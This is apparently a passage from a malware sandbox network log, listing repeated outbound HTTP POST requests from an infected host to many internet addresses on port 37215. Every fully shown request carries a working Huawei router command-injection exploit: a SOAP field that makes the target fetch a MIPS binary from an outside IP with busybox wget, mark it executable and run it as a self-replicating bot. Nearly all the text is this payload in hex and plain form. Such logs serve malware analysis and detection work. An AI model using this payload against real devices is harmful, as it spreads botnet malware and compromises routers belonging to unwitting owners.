6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2439192.168.2.1360496157.137.224.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.802361965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2440192.168.2.1343088157.2.249.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804037094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2441192.168.2.1336766159.137.166.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804203987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2442192.168.2.1353168157.59.146.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804217100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2443192.168.2.1332852157.253.68.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804234982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2444192.168.2.135178641.245.121.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804250956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2445192.168.2.133999841.69.44.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804272890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2446192.168.2.1359706157.37.32.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804783106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2447192.168.2.1342656204.6.159.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804811001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2448192.168.2.135788841.174.3.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804833889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2449192.168.2.1340190157.109.136.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.804924011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
